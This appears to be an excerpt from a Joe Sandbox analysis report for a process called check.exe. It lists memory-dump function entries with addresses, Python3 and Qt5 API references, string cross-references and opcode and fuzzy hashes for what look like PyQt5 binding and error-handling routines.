Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: CloseHandle$ClearErr_ErrorLastOpenProcess
String ID:
API String ID: 2205208866-0
Opcode ID: 8ce2344d55d79cf410c1b57ed2bc42e4a7a590aad4ae1116860707e52f61f069
Instruction ID: f78104f8f9d1520c3d15b5c193de1c78b4fd9a6e14594be5bcd5ab96698b9b3d
Opcode Fuzzy Hash: 8ce2344d55d79cf410c1b57ed2bc42e4a7a590aad4ae1116860707e52f61f069
Instruction Fuzzy Hash: B8F01CA8F1AA0B92FF7D5B73E46423502916F4DB42F89643CD99E467D0FD2C68898680

Function 00007FFB9DD61350 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

RtlNtStatusToDosErrorNoTeb.NTDLL ref: 00007FFB9DD61385
PyErr_SetFromWindowsErrWithFilename.PYTHON3 ref: 00007FFB9DD613A8

Strings

(originated from %s), xrefs: 00007FFB9DD61390

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Err_ErrorFilenameFromStatusWindowsWith
String ID: (originated from %s)
API String ID: 3439497670-1804376747
Opcode ID: 343097d7c65493795a45c95d534faae3237fe2f10a2ccadc5cec81e39ac28d08
Instruction ID: cf1d6ae95e4709ae81981274a18ccfba3aa03d8e7afc838d7d70502aa7b57be6
Opcode Fuzzy Hash: 343097d7c65493795a45c95d534faae3237fe2f10a2ccadc5cec81e39ac28d08
Instruction Fuzzy Hash: 1CF044D1B1CA8581EB708B76F45137923A0FF4C798FC06131D6CD8675AED2CD1448784

Function 00007FFB9DD61070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FFB9DD61092

Part of subcall function 00007FFB9DD61010: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFB9DD6105B

PyErr_SetFromWindowsErrWithFilename.PYTHON3 ref: 00007FFB9DD610B5

Strings

(originated from %s), xrefs: 00007FFB9DD6109B

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Err_ErrorFilenameFromLastWindowsWith__stdio_common_vsprintf
String ID: (originated from %s)
API String ID: 4225285543-1804376747
Opcode ID: 8a3d4494e18e7604f768112e4843f1ebb5e692acb9033b9abd8da8cb1651601d
Instruction ID: b30e271e41b9c361aba826bcc594dba42dfc9ae86aa7ac7d23f14977987d6956
Opcode Fuzzy Hash: 8a3d4494e18e7604f768112e4843f1ebb5e692acb9033b9abd8da8cb1651601d
Instruction Fuzzy Hash: 4FF03AA1718A8582EA309B36F4513AA63A0FF8C788FC52531DBCC4B25AEE3CD1458B44

Analysis Process: check.exePID: 5536, Parent PID: 4128COMMON

Execution Graph

Execution Coverage:	0.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1713
Total number of Limit Nodes:	3

Executed Functions

Function 00007FFB9A352B00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_Py_Dealloc.PYTHON3 ref: 00007FFB9A352BB5

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

??GQPainterPath@@QEBA?AV0@AEBV0@@Z.QT5GUI ref: 00007FFB9A352B72

Strings

J9J9, xrefs: 00007FFB9A352B2D

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: DeallocPainterPath@@V0@@malloc
String ID: J9J9
API String ID: 3358426265-2881787613
Opcode ID: 397f20297a745331685ad4fe260f2d81337722706534342931fde31b935acf1f
Instruction ID: 5ef42111d5763dc8072309fd4d222189f6f35bc5c4f576979ed2d51309708df5
Opcode Fuzzy Hash: 397f20297a745331685ad4fe260f2d81337722706534342931fde31b935acf1f
Instruction Fuzzy Hash: 3E216DB2B0CA4582EB90CF66E84426933A9FB88B80F554175DE5D43764DF3CD440CB10

Function 00007FFB9A35B4D0 Relevance: 1.6, APIs: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??0QPainter@@QEAA@PEAVQPaintDevice@@@Z.QT5GUI ref: 00007FFB9A35B593

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Device@@@PaintPainter@@malloc
String ID:
API String ID: 45773141-0
Opcode ID: b82bc66c56b52707f45d0deaa57a676eb05b34faaac532d0dbf26db8a7b54cf3
Instruction ID: b3cc4adae67abc3848d517469e98aa7bb252d98bf30df802465fe8e2f003321f
Opcode Fuzzy Hash: b82bc66c56b52707f45d0deaa57a676eb05b34faaac532d0dbf26db8a7b54cf3
Instruction Fuzzy Hash: 28212C72A0CB8181EB648B26F44026A77A9FB89BC4F544175EE8D53B68DF3CD151C700

Non-executed Functions

Function 00007FFB9A2F9980 Relevance: 35.1, APIs: 19, Strings: 1, Instructions: 141
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PyObject_GetIter.PYTHON3 ref: 00007FFB9A2F999C
PyErr_Clear.PYTHON3 ref: 00007FFB9A2F99AA
_Py_Dealloc.PYTHON3 ref: 00007FFB9A2F99BE
PyType_GetFlags.PYTHON3 ref: 00007FFB9A2F99C8
?sharedNull@QArrayData@@SAPEAU1@XZ.QT5CORE ref: 00007FFB9A2F9A1C
PyErr_Clear.PYTHON3 ref: 00007FFB9A2F9A27
PyIter_Next.PYTHON3 ref: 00007FFB9A2F9A30
PyErr_Clear.PYTHON3 ref: 00007FFB9A2F9A40
PyLong_AsUnsignedLongLongMask.PYTHON3 ref: 00007FFB9A2F9A49
PyErr_Occurred.PYTHON3 ref: 00007FFB9A2F9A54
_Py_Dealloc.PYTHON3 ref: 00007FFB9A2F9A79
PyErr_Clear.PYTHON3 ref: 00007FFB9A2F9A82
PyIter_Next.PYTHON3 ref: 00007FFB9A2F9A8B
PyErr_Occurred.PYTHON3 ref: 00007FFB9A2F9A99
?deallocate@QArrayData@@SAXPEAU1@_K1@Z.QT5CORE ref: 00007FFB9A2F9ACF
_Py_Dealloc.PYTHON3 ref: 00007FFB9A2F9AEB
PyErr_Format.PYTHON3 ref: 00007FFB9A2F9B38
_Py_Dealloc.PYTHON3 ref: 00007FFB9A2F9B4B
_Py_Dealloc.PYTHON3 ref: 00007FFB9A2F9B5F

Strings

index %zd has type '%s' but 'int' is expected, xrefs: 00007FFB9A2F9B28

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Err_$Dealloc$Clear$ArrayData@@Iter_LongNextOccurred$?deallocate@?sharedFlagsFormatIterLong_MaskNull@Object_Type_U1@_Unsigned
String ID: index %zd has type '%s' but 'int' is expected
API String ID: 1054522911-1902674334
Opcode ID: 3024be0910b915447839cbb89722b36bf52f6cf41eaf4212b7a12349fda54e3d
Instruction ID: ed3818aad83352c877adc535a4f05c4f7c37b2eec0345135a830cec140e919d6
Opcode Fuzzy Hash: 3024be0910b915447839cbb89722b36bf52f6cf41eaf4212b7a12349fda54e3d
Instruction Fuzzy Hash: 6E5151B2A0DA2282EB75AF76E94417873A8BF86FA5F1440B1DE0E12790DE7CE4459700

Function 00007FFB9A335980 Relevance: 31.9, APIs: 15, Strings: 3, Instructions: 374
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??0QPalette@@QEAA@XZ.QT5GUI ref: 00007FFB9A3359DC
??0QPalette@@QEAA@AEBVQColor@@@Z.QT5GUI ref: 00007FFB9A335A53

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

Strings

J1J1, xrefs: 00007FFB9A335B10
@J1, xrefs: 00007FFB9A335EE6
J1J1J1J1J1J1J1J1J1, xrefs: 00007FFB9A335CAF

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Palette@@$Color@@@malloc
String ID: @J1$J1J1$J1J1J1J1J1J1J1J1J1
API String ID: 3764790817-546078739
Opcode ID: 7b79cfe6f1c65334bfec613ac97aaa070dd01f58f2062c5257fc66d6e28e45dd
Instruction ID: 78141a02eb40b58bb26126f25fa763133f10253ff7f5f04963c4ba25688bf98f
Opcode Fuzzy Hash: 7b79cfe6f1c65334bfec613ac97aaa070dd01f58f2062c5257fc66d6e28e45dd
Instruction Fuzzy Hash: B212CB76B18B9189EB608F61E8442AD77B8FB89B98F50417ADE8E53B58DF3CD054C700

Function 00007FFB9A2E1B80 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 238
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PyObject_GetIter.PYTHON3 ref: 00007FFB9A2E1BA3
PyErr_Clear.PYTHON3 ref: 00007FFB9A2E1BB1
_Py_Dealloc.PYTHON3 ref: 00007FFB9A2E1BC6
PyType_GetFlags.PYTHON3 ref: 00007FFB9A2E1BD0
PyErr_Clear.PYTHON3 ref: 00007FFB9A2E1C3E
PyIter_Next.PYTHON3 ref: 00007FFB9A2E1C47
?detach_grow@QListData@@QEAAPEAUData@1@PEAHH@Z.QT5CORE ref: 00007FFB9A2E1CC5
?append@QListData@@QEAAPEAPEAXXZ.QT5CORE ref: 00007FFB9A2E1D80

Part of subcall function 00007FFB9A36DD50: ??0QVariant@@QEAA@AEBV0@@Z.QT5CORE(?,?,00000001,00007FFB9A2E1D94), ref: 00007FFB9A36DD8A

_Py_Dealloc.PYTHON3 ref: 00007FFB9A2E1DB9
PyErr_Clear.PYTHON3 ref: 00007FFB9A2E1DC2
PyIter_Next.PYTHON3 ref: 00007FFB9A2E1DCB
PyErr_Occurred.PYTHON3 ref: 00007FFB9A2E1DE5
_Py_Dealloc.PYTHON3 ref: 00007FFB9A2E1E2F
PyErr_Format.PYTHON3 ref: 00007FFB9A2E1E80
_Py_Dealloc.PYTHON3 ref: 00007FFB9A2E1E8F
_Py_Dealloc.PYTHON3 ref: 00007FFB9A2E1ED4
_Py_Dealloc.PYTHON3 ref: 00007FFB9A2E1EE9

Strings

index %zd has type '%s' but 'QInputMethodEvent::Attribute' is expected, xrefs: 00007FFB9A2E1E70

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Dealloc$Err_$Clear$Data@@Iter_ListNext$?append@?detach_grow@Data@1@FlagsFormatIterObject_OccurredType_V0@@Variant@@
String ID: index %zd has type '%s' but 'QInputMethodEvent::Attribute' is expected
API String ID: 4016545419-3488205848
Opcode ID: 811fa673cfc238aaa41eeda6768c5c35441724507aa68ce6c01ac4c5e1f28010
Instruction ID: e38b6894242cea28d7980d040e7e41a29da431e3dec8e7ce65dc93e433b78272
Opcode Fuzzy Hash: 811fa673cfc238aaa41eeda6768c5c35441724507aa68ce6c01ac4c5e1f28010
Instruction Fuzzy Hash: 7DA18CB2A08A4286EB74AF36E4502793769FF96F95F184075DE0E13794CF3CE4959700

Function 00007FFB9A33BEB0 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 219
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

?drawPoints@QPainter@@QEAAXAEBVQPolygonF@@@Z.QT5GUI ref: 00007FFB9A33BF1A
?drawPoints@QPainter@@QEAAXAEBVQPolygon@@@Z.QT5GUI ref: 00007FFB9A33BF8E
?drawPoints@QPainter@@QEAAXPEBVQPointF@@H@Z.QT5GUI ref: 00007FFB9A33C004
PyTuple_Size.PYTHON3 ref: 00007FFB9A33C0A3
?drawPoints@QPainter@@QEAAXPEBVQPointF@@H@Z.QT5GUI ref: 00007FFB9A33C0B4
_Py_Dealloc.PYTHON3 ref: 00007FFB9A33C0D3
?drawPoints@QPainter@@QEAAXPEBVQPoint@@H@Z.QT5GUI ref: 00007FFB9A33C170

Part of subcall function 00007FFB9A362F60: PyTuple_Size.PYTHON3(?,?,?,?,?,00007FFB9A33C1F7), ref: 00007FFB9A362F82
Part of subcall function 00007FFB9A362F60: ??0QPoint@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FFB9A33C1F7), ref: 00007FFB9A362FB5
Part of subcall function 00007FFB9A362F60: PyTuple_Size.PYTHON3(?,?,?,?,?,00007FFB9A33C1F7), ref: 00007FFB9A362FD4
Part of subcall function 00007FFB9A362F60: PyTuple_GetItem.PYTHON3(?,?,?,?,?,00007FFB9A33C1F7), ref: 00007FFB9A362FF5
Part of subcall function 00007FFB9A362F60: PyTuple_Size.PYTHON3(?,?,?,?,?,00007FFB9A33C1F7), ref: 00007FFB9A363050

PyTuple_Size.PYTHON3 ref: 00007FFB9A33C203
?drawPoints@QPainter@@QEAAXPEBVQPoint@@H@Z.QT5GUI ref: 00007FFB9A33C214
_Py_Dealloc.PYTHON3 ref: 00007FFB9A33C233

Strings

drawPoints(self, points: QPolygonF)drawPoints(self, points: QPolygon)drawPoints(self, points: Optional[PyQt5.sip.array[Union[QPointF, QPoint]]])drawPoints(self, point: Optional[Union[QPointF, QPoint]], *args: Union[QPointF, QPoint])drawPoints(self, points:, xrefs: 00007FFB9A33C249
BJ9, xrefs: 00007FFB9A33BED5, 00007FFB9A33BF50
BJ0W, xrefs: 00007FFB9A33C03D
BJ8W, xrefs: 00007FFB9A33C1A6
drawPoints, xrefs: 00007FFB9A33C254
QPainter, xrefs: 00007FFB9A33C25B

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?drawPainter@@Points@Tuple_$Size$Point@@$DeallocPoint$F@@@ItemPolygonPolygon@@@
String ID: BJ0W$BJ8W$BJ9$QPainter$drawPoints$drawPoints(self, points: QPolygonF)drawPoints(self, points: QPolygon)drawPoints(self, points: Optional[PyQt5.sip.array[Union[QPointF, QPoint]]])drawPoints(self, point: Optional[Union[QPointF, QPoint]], *args: Union[QPointF, QPoint])drawPoints(self, points:
API String ID: 2352560762-2263801330
Opcode ID: 07e88b2f091a9ea49d213234de3db452ac8d20a710bd02d5bca34276e61ffb26
Instruction ID: 6630f131d65a28a3e54e84b1ae337a4e22672ec299ecc9140e640fec4dc5621b
Opcode Fuzzy Hash: 07e88b2f091a9ea49d213234de3db452ac8d20a710bd02d5bca34276e61ffb26
Instruction Fuzzy Hash: BCC14CB6A19B5689EB60CF71E8800AD77B8FB48B88B505176EE4E43B68DF3CD044C740

Function 00007FFB9A30FC70 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 130
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PySequence_Check.PYTHON3 ref: 00007FFB9A30FC8D
PyType_GetFlags.PYTHON3 ref: 00007FFB9A30FC9B
PySequence_Size.PYTHON3 ref: 00007FFB9A30FCD9
PyErr_Format.PYTHON3 ref: 00007FFB9A30FD03
PySequence_GetItem.PYTHON3 ref: 00007FFB9A30FD2E
PyErr_Occurred.PYTHON3 ref: 00007FFB9A30FD57
PySequence_GetItem.PYTHON3 ref: 00007FFB9A30FD85
PyErr_Occurred.PYTHON3 ref: 00007FFB9A30FDAD
PyErr_Format.PYTHON3 ref: 00007FFB9A30FDDD
